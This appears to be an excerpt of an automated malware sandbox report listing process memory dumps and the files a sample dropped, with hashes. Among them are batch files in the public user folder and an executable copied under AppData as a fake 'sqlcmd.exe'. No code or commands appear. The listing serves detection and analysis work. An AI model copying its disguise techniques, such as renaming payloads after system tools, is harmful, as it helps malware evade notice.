SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/3728-163-0x0000000000690000-0x0000000000691000-memory.dmp

memory/3524-165-0x00000000004C0000-0x000000000060A000-memory.dmp

memory/3732-166-0x0000000004A40000-0x0000000004AA6000-memory.dmp

memory/3732-167-0x0000000007460000-0x0000000007461000-memory.dmp

memory/3728-168-0x0000000004EC0000-0x0000000004F20000-memory.dmp

memory/1192-170-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/3728-172-0x0000000007510000-0x0000000007511000-memory.dmp

memory/1192-175-0x0000000000E80000-0x0000000000E81000-memory.dmp

memory/1344-178-0x0000000000000000-mapping.dmp

memory/1264-177-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/3728-181-0x0000000007480000-0x0000000007481000-memory.dmp

memory/1192-183-0x0000000005690000-0x00000000056F0000-memory.dmp

memory/3728-184-0x0000000004F50000-0x0000000004F51000-memory.dmp

memory/3732-186-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

memory/1264-188-0x00000000004C0000-0x000000000060A000-memory.dmp

memory/2372-190-0x0000000000000000-mapping.dmp

memory/3732-191-0x00000000023E0000-0x00000000023E2000-memory.dmp

memory/3732-193-0x0000000004C80000-0x0000000004C81000-memory.dmp

memory/1192-196-0x0000000005710000-0x0000000005711000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 e774e48339bb3205c7d0f4e4c3539a0f
SHA1 c5a0297bc5ccfeee4bab58a5adf415bac0155e63
SHA256 2b132ad40aeb3e7f8275c20082157abcd81eba769913e328157ca50ad72d72b7
SHA512 e4c569e22de23083ea8884baa2a8dd72601f31d791a2801c49c9c41479a3190d3377816e4346f7da00cb1315d5a8d9c83f03dcfbf01e54489d8e23169000c01e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 3eff1d28a83d7c01ebbd6fdbeeb51b9b
SHA1 4f34a875b74b9b002ab25fb2a95a18ce94fbb783
SHA256 668692f2c0638542a373e6622e97ab2e356a18d3b500a2bc82da133de1b7ac43
SHA512 1c64b1895f0d8aaec135e36f99ff95c63193230dd2a361513c6b1a9964630455ebe6c7504e8eb172f83784d6617b5bd5b06ea9d3f898ec2684b996c167710505

memory/2524-200-0x0000000000000000-mapping.dmp

memory/2612-201-0x0000000000000000-mapping.dmp

memory/2524-202-0x0000000000810000-0x0000000000811000-memory.dmp

memory/2524-203-0x0000000000870000-0x0000000000871000-memory.dmp

memory/2524-204-0x0000000010580000-0x00000000105F3000-memory.dmp

memory/3176-205-0x0000000000400000-0x0000000000405000-memory.dmp

memory/3176-206-0x0000000000400000-0x0000000000405000-memory.dmp

memory/3176-207-0x0000000000400000-0x0000000000405000-memory.dmp

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

memory/2920-211-0x0000000000000000-mapping.dmp

memory/3176-213-0x0000000000400000-0x0000000000405000-memory.dmp

memory/3176-210-0x00000000004019E4-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/4020-214-0x0000000000000000-mapping.dmp

C:\Users\Public\UKO.bat

MD5 eaf8d967454c3bbddbf2e05a421411f8
SHA1 6170880409b24de75c2dc3d56a506fbff7f6622c
SHA256 f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512 fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

memory/1372-216-0x0000000000000000-mapping.dmp

memory/3596-217-0x0000000000000000-mapping.dmp

memory/4000-218-0x0000000000000000-mapping.dmp

memory/2524-219-0x0000000000B90000-0x0000000000C00000-memory.dmp

memory/2524-220-0x0000000000550000-0x0000000000551000-memory.dmp

memory/4008-221-0x0000000000000000-mapping.dmp

C:\Users\Public\nest.bat

MD5 8ada51400b7915de2124baaf75e3414c
SHA1 1a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA256 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA512 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

memory/64-223-0x0000000000000000-mapping.dmp

memory/3728-224-0x0000000005060000-0x00000000050D2000-memory.dmp

memory/3732-226-0x0000000004B50000-0x0000000004BC7000-memory.dmp

memory/1192-225-0x0000000005790000-0x0000000005802000-memory.dmp

memory/3728-228-0x0000000004FF0000-0x0000000005010000-memory.dmp

memory/1192-227-0x0000000005720000-0x000000000573F000-memory.dmp

memory/3732-229-0x00000000055B0000-0x00000000055D6000-memory.dmp

memory/3040-230-0x0000000000400000-0x0000000000408000-memory.dmp

memory/216-231-0x0000000000400000-0x000000000040C000-memory.dmp

memory/3040-232-0x0000000000403BEE-mapping.dmp

memory/216-233-0x000000000040616E-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/4044-239-0x0000000000000000-mapping.dmp

memory/580-243-0x0000000000000000-mapping.dmp

memory/2288-244-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\tmpDD03.tmp

MD5 bc2b6748d2661e9ce52308b3370f3cd3
SHA1 525a293e2aae508e0963f4a4a4c6927f8528e31a
SHA256 44049739773b479c5cbb04a4bf8371d0d365a7be7c65f765c62a57358f346e82
SHA512 568d161df4269764b26ce7c8e1f9ed8a726f6bf7234b8a2b1427ca14c30f90ca789f561a9e815a15940570d542e4baa656c002ff1f4be32dd5c7857b8e576957

memory/1484-248-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1484-249-0x000000000040C71E-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\12LA5TJUB3.exe.log

MD5 0c2899d7c6746f42d5bbe088c777f94c
SHA1 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA256 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512 ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

C:\Windows\temp\i2gwbrqy.inf

MD5 f0592949b756677f5e2dedc4089fa849
SHA1 d2546de183ea26fee3cab283e2e45dbad7493c5b
SHA256 e69805ca130fec7259801b63c3cd3eafec9a4cc6e4d8168c1a55bdab4e7ff96f
SHA512 1ceabc24a994e665d9ffe797e6ef3b06dac2f11ff9c718c3f50a7b65e0506bd5aea4ac86fc5b9e851c0c36e9912a709d9717e933459d3d23a24c0c18d771de6c

memory/580-252-0x0000000006A60000-0x0000000006A61000-memory.dmp

memory/580-256-0x00000000068E0000-0x00000000068E1000-memory.dmp

memory/580-257-0x00000000070A0000-0x00000000070A1000-memory.dmp

memory/216-259-0x0000000004D10000-0x000000000520E000-memory.dmp

memory/216-258-0x0000000004D10000-0x000000000520E000-memory.dmp

memory/580-260-0x0000000006A62000-0x0000000006A63000-memory.dmp

memory/580-261-0x0000000006DF0000-0x0000000006DF1000-memory.dmp

memory/580-262-0x0000000006E90000-0x0000000006E91000-memory.dmp

memory/580-263-0x0000000006F00000-0x0000000006F01000-memory.dmp

memory/580-265-0x00000000076D0000-0x00000000076D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1QL8Pt2Uq1.exe.log

MD5 0c2899d7c6746f42d5bbe088c777f94c
SHA1 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA256 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512 ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

memory/2248-267-0x0000000000000000-mapping.dmp

memory/3640-268-0x0000000000000000-mapping.dmp

memory/1484-269-0x0000000005080000-0x0000000005081000-memory.dmp

memory/3640-272-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

C:\Windows\temp\h3gk1fsv.exe

MD5 f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1 ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA256 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA512 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

C:\Windows\Temp\h3gk1fsv.exe

MD5 f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1 ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA256 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA512 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

memory/2748-274-0x0000000000000000-mapping.dmp

memory/1116-275-0x0000000000000000-mapping.dmp

memory/580-276-0x0000000006AF0000-0x0000000006AF1000-memory.dmp

memory/580-277-0x0000000007CB0000-0x0000000007CB1000-memory.dmp

memory/580-281-0x0000000007D00000-0x0000000007D01000-memory.dmp

memory/2748-284-0x0000028C883D3000-0x0000028C883D5000-memory.dmp

memory/2748-283-0x0000028C883D0000-0x0000028C883D2000-memory.dmp

memory/2748-285-0x0000028CA0910000-0x0000028CA0911000-memory.dmp

memory/2748-288-0x0000028CA0AC0000-0x0000028CA0AC1000-memory.dmp

memory/2748-293-0x0000028C883D6000-0x0000028C883D8000-memory.dmp

memory/580-315-0x00000000089C0000-0x00000000089F3000-memory.dmp

memory/580-331-0x000000007E7B0000-0x000000007E7B1000-memory.dmp

memory/580-333-0x0000000006A63000-0x0000000006A64000-memory.dmp

memory/1468-372-0x0000000000000000-mapping.dmp

memory/2508-377-0x0000000000000000-mapping.dmp

memory/980-382-0x0000000000000000-mapping.dmp

memory/2644-388-0x0000000000000000-mapping.dmp

memory/2024-397-0x0000000000000000-mapping.dmp

memory/3804-404-0x0000000000000000-mapping.dmp

memory/1468-411-0x0000016E61140000-0x0000016E61142000-memory.dmp

memory/4160-413-0x0000000000000000-mapping.dmp

memory/1468-415-0x0000016E61143000-0x0000016E61145000-memory.dmp

memory/980-419-0x000002A2EBA90000-0x000002A2EBA92000-memory.dmp

memory/980-420-0x000002A2EBA93000-0x000002A2EBA95000-memory.dmp

memory/2508-423-0x000002B60B320000-0x000002B60B322000-memory.dmp

memory/2508-426-0x000002B60B323000-0x000002B60B325000-memory.dmp

memory/2644-430-0x0000027051CF0000-0x0000027051CF2000-memory.dmp

memory/2644-433-0x0000027051CF3000-0x0000027051CF5000-memory.dmp

memory/4296-425-0x0000000000000000-mapping.dmp

memory/4432-437-0x0000000000000000-mapping.dmp

memory/2024-451-0x0000016B04640000-0x0000016B04642000-memory.dmp

memory/4160-453-0x000001C8770D0000-0x000001C8770D2000-memory.dmp

memory/2024-455-0x0000016B04643000-0x0000016B04645000-memory.dmp

memory/3804-457-0x0000026C2A770000-0x0000026C2A772000-memory.dmp

memory/3804-458-0x0000026C2A773000-0x0000026C2A775000-memory.dmp

memory/4160-459-0x000001C8770D3000-0x000001C8770D5000-memory.dmp

memory/4296-465-0x000001E07F163000-0x000001E07F165000-memory.dmp

memory/4296-463-0x000001E07F160000-0x000001E07F162000-memory.dmp

memory/4432-476-0x000001636FD00000-0x000001636FD02000-memory.dmp

memory/4432-477-0x000001636FD03000-0x000001636FD05000-memory.dmp

memory/4296-500-0x000001E07F166000-0x000001E07F168000-memory.dmp

memory/4352-511-0x0000000000000000-mapping.dmp

memory/1468-521-0x0000016E61146000-0x0000016E61148000-memory.dmp

memory/2508-524-0x000002B60B326000-0x000002B60B328000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/4948-543-0x0000000000000000-mapping.dmp

memory/980-550-0x000002A2EBA96000-0x000002A2EBA98000-memory.dmp

memory/2644-555-0x0000027051CF6000-0x0000027051CF8000-memory.dmp

memory/4352-581-0x000002597B9A0000-0x000002597B9A2000-memory.dmp

memory/2024-589-0x0000016B04646000-0x0000016B04648000-memory.dmp

memory/4352-585-0x000002597B9A3000-0x000002597B9A5000-memory.dmp

memory/4948-619-0x0000016DCC0C0000-0x0000016DCC0C2000-memory.dmp

memory/4948-624-0x0000016DCC0C3000-0x0000016DCC0C5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 7247129cd0644457905b7d6bf17fd078
SHA1 dbf9139b5a1b72141f170d2eae911bbbe7e128c8
SHA256 dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4
SHA512 9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/4896-652-0x0000000000000000-mapping.dmp

memory/3804-699-0x00007FF6C0550000-0x00007FF6C0551000-memory.dmp

memory/4896-723-0x0000018ED03B0000-0x0000018ED03B2000-memory.dmp

memory/4896-725-0x0000018ED03B3000-0x0000018ED03B5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c2263b17c6d6cc450042af097ec9637e
SHA1 a1c15c9c8ec782e901b765f30c8e6e128a703b58
SHA256 a0063db0c47765089745e0600c0afff25d3ed7c4a3072cd28b55e7488c7b1a8e
SHA512 7b0077eb77f6967b732169618404354b97163d445810accabdbc53f7efb4b1385d6021dad686d6446186ee37464f80d228613455429b2fc122198e0bbbc8c10b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 1a8c542e6d44e65f4be561e6d7013e56
SHA1 96476eba76d1a713e9856ce49f060c3dabd00f9e
SHA256 16b857d9ab9e4ba09f2ebade0aad62a2b28d17dee22b281e2b326d99c57a6762
SHA512 0dd7489aacc2ccc952ce1ff69de05cdd7c57fea39c8e29dc31cdd5313101f466610ab98f42c7c2230b3a284dace93230283233fe2cc10830d666633215f56374